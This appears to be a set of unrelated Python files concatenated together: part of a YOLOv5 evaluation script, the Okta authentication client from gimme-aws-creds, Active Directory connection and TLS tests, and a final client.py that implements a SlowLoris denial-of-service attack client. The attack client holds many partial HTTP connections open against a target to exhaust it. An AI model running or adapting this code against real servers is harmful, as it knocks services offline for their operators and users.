save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
)
elif opt.task == 'study': # run over a range of settings and save/plot
for weights in ['yolov5s.pt', 'yolov5m.pt', 'yolov5l.pt', 'yolov5x.pt']:
f = 'study_%s_%s.txt' % (Path(opt.data).stem, Path(weights).stem) # filename to save to
x = list(range(320, 800, 64)) # x axis
y = [] # y axis
for i in x: # img-size
print('\nRunning %s point %s...' % (f, i))
r, _, t = test(opt.data, weights, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(f, x) # plot
|
okta.py
|
"""
Copyright 2016-present Nike, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
You may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
"""
import base64
import getpass
import re
import time
import uuid
from codecs import decode
from urllib.parse import parse_qs
from urllib.parse import urlparse
import keyring
import requests
from bs4 import BeautifulSoup
from keyring.backends.fail import Keyring as FailKeyring
from keyring.errors import PasswordDeleteError
from requests.adapters import HTTPAdapter, Retry
from gimme_aws_creds.u2f import FactorU2F
from gimme_aws_creds.webauthn import WebAuthnClient, FakeAssertion
from . import errors, ui, version, duo
from multiprocessing import Process
import webbrowser
import socket
class OktaClient(object):
"""
    The Okta Client Class performs the necessary API
calls to Okta to get temporary AWS credentials. An
Okta API key and URL must be provided.
"""
KEYRING_SERVICE = 'gimme-aws-creds'
KEYRING_ENABLED = not isinstance(keyring.get_keyring(), FailKeyring)
def __init__(self, gac_ui, okta_org_url, verify_ssl_certs=True, device_token=None):
"""
:type gac_ui: ui.UserInterface
:param okta_org_url: Base URL string for Okta IDP.
:param verify_ssl_certs: Enable/disable SSL verification
"""
self.ui = gac_ui
self._okta_org_url = okta_org_url
self._verify_ssl_certs = verify_ssl_certs
if verify_ssl_certs is False:
requests.packages.urllib3.disable_warnings()
self._username = None
self._password = None
self._preferred_mfa_type = None
self._mfa_code = None
self._remember_device = None
self._use_oauth_access_token = False
self._use_oauth_id_token = False
self._oauth_access_token = None
self._oauth_id_token = None
self._jar = requests.cookies.RequestsCookieJar()
# Allow up to 5 retries on requests to Okta in case we have network issues
self._http_client = requests.Session()
self._http_client.cookies = self._jar
self.device_token = device_token
retries = Retry(total=5, backoff_factor=1,
method_whitelist=['GET', 'POST'])
self._http_client.mount('https://', HTTPAdapter(max_retries=retries))
@property
def device_token(self):
return self._http_client.cookies.get('DT')
@device_token.setter
def device_token(self, device_token):
if device_token is not None:
match = re.search('^https://(.*)', self._okta_org_url)
self._http_client.cookies.set('DT', device_token, domain=match.group(1), path='/')
def set_username(self, username):
self._username = username
def set_password(self, password):
self._password = password
def set_preferred_mfa_type(self, preferred_mfa_type):
self._preferred_mfa_type = preferred_mfa_type
def set_mfa_code(self, mfa_code):
self._mfa_code = mfa_code
def set_remember_device(self, remember_device):
self._remember_device = bool(remember_device)
def use_oauth_access_token(self, val=True):
self._use_oauth_access_token = val
def use_oauth_id_token(self, val=True):
self._use_oauth_id_token = val
def stepup_auth(self, embed_link, state_token=None):
""" Login to Okta using the Step-up authentication flow"""
flow_state = self._get_initial_flow_state(embed_link, state_token)
while flow_state.get('apiResponse', {}).get('status') != 'SUCCESS':
time.sleep(0.5)
flow_state = self._next_login_step(
flow_state.get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def stepup_auth_saml(self, embed_link, state_token=None):
""" Login to a SAML-protected service using the Step-up authentication flow"""
api_response = self.stepup_auth(embed_link, state_token)
# if a session token is in the API response, we can use that to authenticate
if 'sessionToken' in api_response:
saml_response = self.get_saml_response(
embed_link + '?sessionToken=' + api_response['sessionToken'])
else:
saml_response = self.get_saml_response(
api_response['_links']['next']['href'])
login_result = self._http_client.post(
saml_response['TargetUrl'],
data=saml_response,
verify=self._verify_ssl_certs
)
return login_result.text
def auth(self):
""" Login to Okta using the authentication API"""
flow_state = self._login_username_password(None, self._okta_org_url + '/api/v1/authn')
while flow_state.get('apiResponse', {}).get('status') != 'SUCCESS':
time.sleep(0.5)
flow_state = self._next_login_step(
flow_state.get('apiResponse', {}).get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def auth_session(self, **kwargs):
""" Authenticate the user and return the Okta Session ID and username"""
login_response = self.auth()
session_url = self._okta_org_url + '/login/sessionCookieRedirect'
if 'redirect_uri' not in kwargs:
redirect_uri = 'http://localhost:8080/login'
else:
redirect_uri = kwargs['redirect_uri']
params = {
'token': login_response['sessionToken'],
'redirectUrl': redirect_uri
}
response = self._http_client.get(
session_url,
params=params,
headers=self._get_headers(),
verify=self._verify_ssl_certs,
allow_redirects=False
)
return {
"username": login_response['_embedded']['user']['profile']['login'],
"session": response.cookies['sid'],
"device_token": self._http_client.cookies['DT']
}
def auth_oauth(self, client_id, **kwargs):
""" Login to Okta and retrieve access token, ID token or both """
login_response = self.auth()
if 'access_token' not in kwargs:
access_token = True
else:
access_token = kwargs['access_token']
if 'id_token' not in kwargs:
id_token = False
else:
id_token = kwargs['id_token']
if 'scopes' not in kwargs:
scopes = ['openid']
else:
scopes = kwargs['scopes']
response_types = []
if id_token is True:
response_types.append('id_token')
if access_token is True:
response_types.append('token')
if 'authorization_server' not in kwargs:
oauth_url = self._okta_org_url + '/oauth2/v1/authorize'
else:
oauth_url = self._okta_org_url + '/oauth2/' + kwargs['authorization_server'] + '/v1/authorize'
if 'redirect_uri' not in kwargs:
redirect_uri = 'http://localhost:8080/login'
else:
redirect_uri = kwargs['redirect_uri']
if 'nonce' not in kwargs:
nonce = uuid.uuid4().hex
else:
nonce = kwargs['nonce']
if 'state' not in kwargs:
state = 'auth_oauth'
else:
state = kwargs['state']
params = {
'sessionToken': login_response['sessionToken'],
'client_id': client_id,
'redirect_uri': redirect_uri,
'nonce': nonce,
'state': state,
'response_type': ' '.join(response_types),
'scope': ' '.join(scopes)
}
response = self._http_client.get(
oauth_url,
params=params,
headers=self._get_headers(),
verify=self._verify_ssl_certs,
allow_redirects=False
)
response.raise_for_status()
url_parse_results = urlparse(response.headers['Location'])
query_result = parse_qs(url_parse_results.fragment)
tokens = {}
if 'access_token' in query_result:
tokens['access_token'] = query_result['access_token'][0]
self._oauth_access_token = query_result['access_token'][0]
if 'id_token' in query_result:
tokens['id_token'] = query_result['id_token'][0]
self._oauth_id_token = query_result['id_token'][0]
return tokens
@staticmethod
def _get_headers():
"""sets the default headers"""
headers = {
'User-Agent': "gimme-aws-creds {}".format(version),
'Accept': 'application/json',
'Content-Type': 'application/json',
}
return headers
def _get_initial_flow_state(self, embed_link, state_token=None):
""" Starts the authentication flow with Okta"""
if state_token is None:
response = self._http_client.get(
embed_link, allow_redirects=False)
response.raise_for_status()
url_parse_results = urlparse(response.headers['Location'])
state_token = parse_qs(url_parse_results.query)['stateToken'][0]
response = self._http_client.post(
self._okta_org_url + '/api/v1/authn',
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
return {'stateToken': state_token, 'apiResponse': response.json()}
def _next_login_step(self, state_token, login_data):
""" decide what the next step in the login process is"""
if 'errorCode' in login_data:
raise errors.GimmeAWSCredsError(
"LOGIN ERROR: {} | Error Code: {}".format(login_data['errorSummary'], login_data['errorCode']), 2)
status = login_data['status']
if status == 'UNAUTHENTICATED':
return self._login_username_password(state_token, login_data['_links']['next']['href'])
elif status == 'LOCKED_OUT':
raise errors.GimmeAWSCredsError("Your Okta access has been locked out due to failed login attempts.", 2)
elif status == 'MFA_ENROLL':
raise errors.GimmeAWSCredsError("You must enroll in MFA before using this tool.", 2)
elif status == 'MFA_REQUIRED':
return self._login_multi_factor(state_token, login_data)
elif status == 'MFA_CHALLENGE':
if login_data['_embedded']['factor']['factorType'] == 'u2f':
return self._check_u2f_result(state_token, login_data)
if login_data['_embedded']['factor']['factorType'] == 'webauthn':
return self._check_webauthn_result(state_token, login_data)
if 'factorResult' in login_data and login_data['factorResult'] == 'WAITING':
return self._check_push_result(state_token, login_data)
else:
return self._login_input_mfa_challenge(state_token, login_data['_links']['next']['href'])
else:
raise RuntimeError('Unknown login status: ' + status)
def _login_username_password(self, state_token, url):
""" login to Okta with a username and password"""
creds = self._get_username_password_creds()
login_json = {
'username': creds['username'],
'password': creds['password']
}
# If this isn't a Step-up auth flow, we won't have a stateToken
if state_token is not None:
login_json['stateToken'] = state_token
response = self._http_client.post(
url,
json=login_json,
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
if 'errorCode' in response_data:
if self.KEYRING_ENABLED:
try:
keyring.delete_password(self.KEYRING_SERVICE, creds['username'])
except PasswordDeleteError:
pass
raise errors.GimmeAWSCredsError(
"LOGIN ERROR: {} | Error Code: {}".format(response_data['errorSummary'], response_data['errorCode']), 2)
func_result = {'apiResponse': response_data}
if 'stateToken' in response_data:
func_result['stateToken'] = response_data['stateToken']
return func_result
def _login_send_sms(self, state_token, factor):
""" Send SMS message for second factor authentication"""
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("A verification code has been sent to " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_call(self, state_token, factor):
""" Send Voice call for second factor authentication"""
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("You should soon receive a phone call at " + factor['profile']['phoneNumber'])
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_send_push(self, state_token, factor):
""" Send 'push' for the Okta Verify mobile app """
response = self._http_client.post(
factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("Okta Verify push sent...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _login_input_webauthn_challenge(self, state_token, factor):
""" Retrieve nonce """
response = self._http_client.post(
factor['_links']['verify']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
self.ui.info("Challenge with security keys ...")
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
@staticmethod
def get_available_socket():
"""Get available socket, but requesting 0 and allowing OS to provide ephemeral open port"""
s = socket.socket()
s.bind(('127.0.0.1', 0))
server_address = s.getsockname()
return server_address
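# The ephemeral (host, port) pair returned here is used by _login_duo_challenge below to
# serve the local Duo web page for the browser-based flow.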
def _login_duo_challenge(self, state_token, factor):
""" Duo MFA challenge """
# Use any one-time passcode supplied up front (self._mfa_code)
passcode = self._mfa_code
if factor['factorType'] is None:
# Prompt the user for which Duo factor to use
raise duo.FactorRequired(factor['id'], state_token)
if factor['factorType'] == "passcode" and not passcode:
raise duo.PasscodeRequired(factor['id'], state_token)
data = {'fid': factor['id'],
'stateToken': state_token}
response = self._http_client.post(factor['_links']['verify']['href'],
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
verification = response_data['_embedded']['factor']['_embedded']['verification']
socket_addr = self.get_available_socket()
auth = None
duo_client = duo.Duo(verification, state_token, socket_addr, factor['factorType'])
if factor['factorType'] == "web":
# Duo Web via local browser
self.ui.info("Duo required; opening browser...")
proc = Process(target=duo_client.trigger_web_duo)
proc.start()
time.sleep(2)
webbrowser.open_new('http://{host}:{port}/duo.html'.format(host=socket_addr[0], port=socket_addr[1]))
elif factor['factorType'] == "passcode":
# Duo auth with OTP code without a browser
self.ui.info("Duo required; using OTP...")
auth = duo_client.trigger_duo(passcode=passcode)
else:
# Duo Auth without the browser
self.ui.info("Duo required; check your phone...")
auth = duo_client.trigger_duo()
if auth is not None:
self.mfa_callback(auth, verification, state_token)
try:
sleep = 2
while response_data['status'] != 'SUCCESS':
self.ui.info("Waiting for MFA success...")
time.sleep(sleep)
if response_data.get('factorResult', 'REJECTED') == 'REJECTED':
self.ui.warning("Duo Push REJECTED")
return None
if response_data.get('factorResult', 'TIMEOUT') == 'TIMEOUT':
self.ui.warning("Duo Push TIMEOUT")
return None
links = response_data.get('_links')
response_data = self._http_client.post(
links['next']['href'],
json=data,
headers=self._get_headers(),
verify=self._verify_ssl_certs
).json()
except KeyboardInterrupt:
self.ui.warning("User canceled waiting for MFA success.")
raise
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def mfa_callback(self, auth, verification, state_token):
"""Do callback to Okta with the info from the MFA provider
Args:
auth: String auth from MFA provider to send in the callback
verification: Dict of details used in Okta API calls
state_token: String Okta state token
"""
app = verification['signature'].split(":")[1]
response_sig = "{}:{}".format(auth, app)
callback_params = "stateToken={}&sig_response={}".format(
state_token, response_sig)
url = "{}?{}".format(
verification['_links']['complete']['href'],
callback_params)
ret = self._http_client.post(url)
if ret.status_code != 200:
raise Exception("Bad status from Okta callback {}".format(
ret.status_code))
def _login_multi_factor(self, state_token, login_data):
""" handle multi-factor authentication with Okta"""
factor = self._choose_factor(login_data['_embedded']['factors'])
if factor['factorType'] == 'sms':
return self._login_send_sms(state_token, factor)
elif factor['factorType'] == 'call':
return self._login_send_call(state_token, factor)
elif factor['factorType'] == 'token:software:totp':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'token':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'push':
return self._login_send_push(state_token, factor)
elif factor['factorType'] == 'u2f':
return self._login_input_webauthn_challenge(state_token, factor)
elif factor['factorType'] == 'webauthn':
return self._login_input_webauthn_challenge(state_token, factor)
elif factor['factorType'] == 'token:hardware':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['provider'] == 'DUO':
return self._login_duo_challenge(state_token, factor)
else:
raise errors.GimmeAWSCredsError("Unsupported MFA factor type: " + factor['factorType'], 2)
def _login_input_mfa_challenge(self, state_token, next_url):
""" Submit verification code for SMS or TOTP authentication methods"""
pass_code = self._mfa_code
if pass_code is None:
pass_code = self.ui.input("Enter verification code: ")
response = self._http_client.post(
next_url,
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token, 'passCode': pass_code},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_push_result(self, state_token, login_data):
""" Check Okta API to see if the push request has been responded to"""
time.sleep(1)
response = self._http_client.post(
login_data['_links']['next']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _check_u2f_result(self, state_token, login_data):
# Should be deprecated soon as Okta moves forward with WebAuthn;
# kept only for backward compatibility.
nonce = login_data['_embedded']['factor']['_embedded']['challenge']['nonce']
credential_id = login_data['_embedded']['factor']['profile']['credentialId']
app_id = login_data['_embedded']['factor']['profile']['appId']
verify = FactorU2F(self.ui, app_id, nonce, credential_id)
try:
client_data, signature = verify.verify()
except Exception:
# U2F verification failed or was cancelled; continue with dummy data so Okta rejects the attempt
signature = b'fake'
client_data = b'fake'
client_data = str(base64.urlsafe_b64encode(client_data), "utf-8")
signature_data = str(base64.urlsafe_b64encode(signature), 'utf-8')
response = self._http_client.post(
login_data['_links']['next']['href'] + "?rememberDevice=false",
json={'stateToken': state_token, 'clientData': client_data, 'signatureData': signature_data},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_webauthn_result(self, state_token, login_data):
""" wait for webauthN challenge """
nonce = login_data['_embedded']['factor']['_embedded']['challenge']['challenge']
credential_id = login_data['_embedded']['factor']['profile']['credentialId']
response = {}
""" Authenticator """
verif = WebAuthnClient(self.ui, self._okta_org_url, nonce, credential_id)
try:
client_data, assertion = verif.verify()
except Exception:
# WebAuthn verification failed or was cancelled; continue with a fake assertion so Okta rejects it
client_data = b'fake'
assertion = FakeAssertion()
client_data = str(base64.urlsafe_b64encode(client_data), "utf-8")
signature_data = base64.b64encode(assertion.signature).decode('utf-8')
auth_data = base64.b64encode(assertion.auth_data).decode('utf-8')
response = self._http_client.post(
login_data['_links']['next']['href'] + "?rememberDevice=false",
json={'stateToken': state_token, 'clientData':client_data, 'signatureData': signature_data, 'authenticatorData': auth_data},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def get_hs_stateToken(self, response):
""" Return a step-up auth result for the given response page, or session details when no MFA is required"""
state_token = None
saml_soup = BeautifulSoup(response.text, "html.parser")
if hasattr(saml_soup.title, 'string') and re.match(".* - Extra Verification$", saml_soup.title.string):
# extract the stateToken from the Javascript code in the page and step up to MFA
state_token = decode(re.search(r"var stateToken = '(.*)';", response.text).group(1), "unicode-escape")
api_response = self.stepup_auth(None, state_token)
return api_response
# no MFA required => we should have a session cookies, login flow ends here
api_response = {
'status': 'SUCCESS',
'sessionToken': '',
'session': response.cookies['sid'],
'device_token': self._http_client.cookies['DT']
}
return api_response
def get_saml_response(self, url):
""" return the base64 SAML value object from the SAML Response"""
response = self._http_client.get(url, verify=self._verify_ssl_certs)
response.raise_for_status()
saml_response = None
relay_state = None
form_action = None
saml_soup = BeautifulSoup(response.text, "html.parser")
if saml_soup.find('form') is not None:
form_action = saml_soup.find('form').get('action')
for inputtag in saml_soup.find_all('input'):
if inputtag.get('name') == 'SAMLResponse':
saml_response = inputtag.get('value')
elif inputtag.get('name') == 'RelayState':
relay_state = inputtag.get('value')
if saml_response is None:
# We didn't get a SAML response. Were we redirected to an MFA login page?
if hasattr(saml_soup.title, 'string') and re.match(".* - Extra Verification$", saml_soup.title.string):
# extract the stateToken from the Javascript code in the page and step up to MFA
state_token = decode(re.search(r"var stateToken = '(.*)';", response.text).group(1), "unicode-escape")
api_response = self.stepup_auth(url, state_token)
saml_response = self.get_saml_response(url + '?sessionToken=' + api_response['sessionToken'])
return saml_response
raise RuntimeError(
'Did not receive SAML Response after successful authentication [' + url + ']')
return {'SAMLResponse': saml_response, 'RelayState': relay_state, 'TargetUrl': form_action}
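# High-level flow: get_saml_response() fetches the app's SAML page; if Okta instead serves an
# "Extra Verification" page, the embedded stateToken is extracted, stepup_auth() runs the MFA
# state machine above, and the SAML page is fetched again with the resulting sessionToken.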
def check_kwargs(self, kwargs):
if self._use_oauth_access_token is True:
if 'headers' not in kwargs:
kwargs['headers'] = {}
kwargs['headers']['Authorization'] = "Bearer {}".format(self._oauth_access_token)
if self._use_oauth_id_token is True:
if 'headers' not in kwargs:
kwargs['headers'] = {}
kwargs['headers']['Authorization'] = "Bearer {}".format(self._oauth_id_token)
return kwargs
def get(self, url, **kwargs):
""" Retrieve resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.get(url, **parameters)
def post(self, url, **kwargs):
""" Create resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.post(url, **parameters)
def put(self, url, **kwargs):
""" Modify resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.put(url, **parameters)
def delete(self, url, **kwargs):
""" Delete resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.delete(url, **parameters)
def _choose_factor(self, factors):
""" gets a list of available authentication factors and
asks the user to select the factor they want to use """
self.ui.info("Multi-factor Authentication required.")
# filter the factor list down to just the types specified in preferred_mfa_type
preferred_factors = []
if self._preferred_mfa_type is not None:
preferred_factors = list(filter(lambda item: item['factorType'] == self._preferred_mfa_type, factors))
# If the preferred factor isn't in the list of available factors, we'll let the user know before
# prompting to select another.
if not preferred_factors:
self.ui.notify('Preferred factor type of {} not available.'.format(self._preferred_mfa_type))
if len(preferred_factors) == 1:
factor_name = self._build_factor_name(preferred_factors[0])
self.ui.info(factor_name + ' selected')
selection = factors.index(preferred_factors[0])
else:
self.ui.info("Pick a factor:")
# print out the factors and let the user select
for i, factor in enumerate(factors):
factor_name = self._build_factor_name(factor)
if factor_name != "":
self.ui.info('[{}] {}'.format(i, factor_name))
selection = self.ui.input('Selection: ')
# make sure the choice is valid
if int(selection) >= len(factors):
raise errors.GimmeAWSCredsError("You made an invalid selection")
return factors[int(selection)]
@staticmethod
def _build_factor_name(factor):
""" Build the display name for a MFA factor based on the factor type"""
if factor['factorType'] == 'push':
return "Okta Verify App: " + factor['profile']['deviceType'] + ": " + factor['profile']['name']
elif factor['factorType'] == 'sms':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'call':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'token:software:totp':
return factor['factorType'] + "( " + factor['provider'] + " ) : " + factor['profile']['credentialId']
elif factor['factorType'] == 'token':
return factor['factorType'] + ": " + factor['profile']['credentialId']
elif factor['factorType'] == 'u2f':
return factor['factorType'] + ": " + factor['factorType']
elif factor['factorType'] == 'webauthn':
return factor['factorType'] + ": " + factor['factorType']
elif factor['factorType'] == 'token:hardware':
return factor['factorType'] + ": " + factor['provider']
elif factor['provider'] == 'DUO':
return factor['factorType'] + ": " + factor['provider'].capitalize()
else:
return "Unknown MFA type: " + factor['factorType']
def _get_username_password_creds(self):
"""Get's creds for Okta login from the user."""
if self._username is None:
# ask the user
self._username = self.ui.input('Username: ')
username = self._username
password = self._password
if not password and self.KEYRING_ENABLED:
try:
# If the OS supports a keyring, try to retrieve a previously saved password
password = keyring.get_password(self.KEYRING_SERVICE, username)
if password:
self.ui.info("Using password from keyring for {}".format(username))
except RuntimeError:
self.ui.warning("Unable to get password from keyring.")
if not password:
# Set prompt to include the user name, since username could be set
# via OKTA_USERNAME env and user might not remember.
for x in range(0, 5):
passwd_prompt = "Okta Password for {}: ".format(username)
password = getpass.getpass(prompt=passwd_prompt)
if len(password) > 0:
break
if self.KEYRING_ENABLED:
# If the OS supports a keyring, offer to save the password
if self.ui.input("Do you want to save this password in the keyring? (y/n) ") == 'y':
try:
keyring.set_password(self.KEYRING_SERVICE, username, password)
self.ui.info("Password for {} saved in keyring.".format(username))
except RuntimeError as err:
self.ui.warning("Failed to save password in keyring: " + str(err))
if not password:
raise errors.GimmeAWSCredsError('Password was not provided. Exiting.')
return {'username': username, 'password': password}
|
connection_test.py
|
import demistomock as demisto
from Active_Directory_Query import main
import socket
import ssl
from threading import Thread
import time
import os
import pytest
BASE_TEST_PARAMS = {
'server_ip': '127.0.0.1',
'secure_connection': 'None',
'page_size': '500',
'credentials': {'identifier': 'bad', 'password': 'bad'}
}
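# These defaults use intentionally invalid credentials; the tests below only exercise how
# connection and TLS failures are surfaced through return_error.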
RETURN_ERROR_TARGET = 'Active_Directory_Query.return_error'
def test_bad_host_no_ssl(mocker):
mocker.patch.object(demisto, 'params',
return_value=BASE_TEST_PARAMS)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('server_ip') == '127.0.0.1'
main()
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
def test_bad_ssl(mocker):
params = BASE_TEST_PARAMS.copy()
params['server_ip'] = '185.199.108.153' # disable-secrets-detection
params['secure_connection'] = 'SSL'
params['port'] = 443
mocker.patch.object(demisto, 'params',
return_value=params)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
demisto_info_mock = mocker.patch.object(demisto, "info")
# validate our mock of params
assert demisto.params().get('secure_connection') == 'SSL'
main()
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
assert 'SSL error' in err_msg
# call_args_list holds all calls (we need the first) with a tuple of args list and kwargs
info_msg = demisto_info_mock.call_args_list[0][0][0]
# ip is not in the certificate. so it should fail on host match
assert "doesn't match any name" in info_msg
def ssl_bad_socket_server(port):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# cert and keyfile generated with
# openssl req -x509 -nodes -days 3000 -newkey rsa:2048 -keyout key.pem -out cert.pem
try:
context.load_cert_chain('cert.pem', 'key.pem')
with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock:
sock.bind(('127.0.0.1', port))
sock.listen(5)
with context.wrap_socket(sock, server_side=True) as ssock:
try:
conn, addr = ssock.accept()
except ssl.SSLError as err:
if 'TLSV1_ALERT_UNKNOWN_CA' in str(err):
# all is ok. client refused our cert
return
raise
conn.recv(32)
msg = b'THIS IS A TEST SERVER WHICH IGNORES PROTOCOL\n\n'
for x in range(10):
msg += msg
conn.send(msg)
conn.shutdown(socket.SHUT_RDWR)
conn.close()
except Exception as ex:
pytest.fail("Failed starting ssl_bad_socket_server: {}".format(ex))
raise
def test_faulty_server(mocker):
port = 9638
t = Thread(target=ssl_bad_socket_server, args=(port,))
t.start()
time.sleep(1) # wait for socket server to startup
params = BASE_TEST_PARAMS.copy()
params['server_ip'] = '127.0.0.1' # disable-secrets-detection
params['secure_connection'] = 'SSL'
params['unsecure'] = True
params['port'] = port
mocker.patch.object(demisto, 'params',
return_value=params)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('secure_connection') == 'SSL'
main()
t.join(5)
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
def test_ssl_custom_cert(mocker, request):
ENV_KEY = 'SSL_CERT_FILE'
os.environ[ENV_KEY] = 'cert.pem'
def cleanup():
os.environ.pop(ENV_KEY)
request.addfinalizer(cleanup)
port = 9637
t = Thread(target=ssl_bad_socket_server, args=(port,))
t.start()
time.sleep(1) # wait for socket server to startup
params = BASE_TEST_PARAMS.copy()
params['server_ip'] = '127.0.0.1' # disable-secrets-detection
params['secure_connection'] = 'SSL'
params['port'] = port
mocker.patch.object(demisto, 'params',
return_value=params)
return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
# validate our mock of params
assert demisto.params().get('secure_connection') == 'SSL'
main()
t.join(5)
assert return_error_mock.call_count == 1
# call_args last call with a tuple of args list and kwargs
err_msg = return_error_mock.call_args[0][0]
assert len(err_msg) < 100
assert 'Failed to access' in err_msg
assert 'SSL error' not in err_msg
|
client.py
|
"""This module implements the SlowLoris client."""
import threading
import time
from .connection import LorisConnection
from .user_agent import get_random_user_agent
class LorisClient:
"""SlowLoris attack client."""
def __init__(self):
self.targets = []
self.keepalive_thread = threading.Thread(target=self.keep_alive)
self.keepalive_thread.daemon = True
self.keepalive_thread.start()
def attack(self, target):
"""Starts the attack."""
self.targets.append(target)
print("[{}] Initializing {} connections.".format(target.host, target.count))
# Start 'count' connections and send the initial HTTP headers.
for i in range(target.count):
conn = LorisConnection(target, True).send_headers(get_random_user_agent())
target.connections.insert(0, conn)
if i == target.count - 1:
print("[{}] All connections initialized.".format(target.host))
def stop(self):
"""Stops the attack."""
for target in self.targets:
print("[{}] Shutting down all connections.".format(target.host))
for conn in target.connections:
conn.close()
def keep_alive(self):
"""Keeps all targets alive and maintains their connections."""
while True:
time.sleep(5)
# Iterate over all targets.
for target in self.targets:
self.keep_target_alive(target)
def keep_target_alive(self, target):
"""Keeps a target alive and maintains its connections."""
# Print latest latency.
latency = target.get_latency()
if latency is not None:
print("[{}] Current latency: {:.2f} ms".format(target.host, latency))
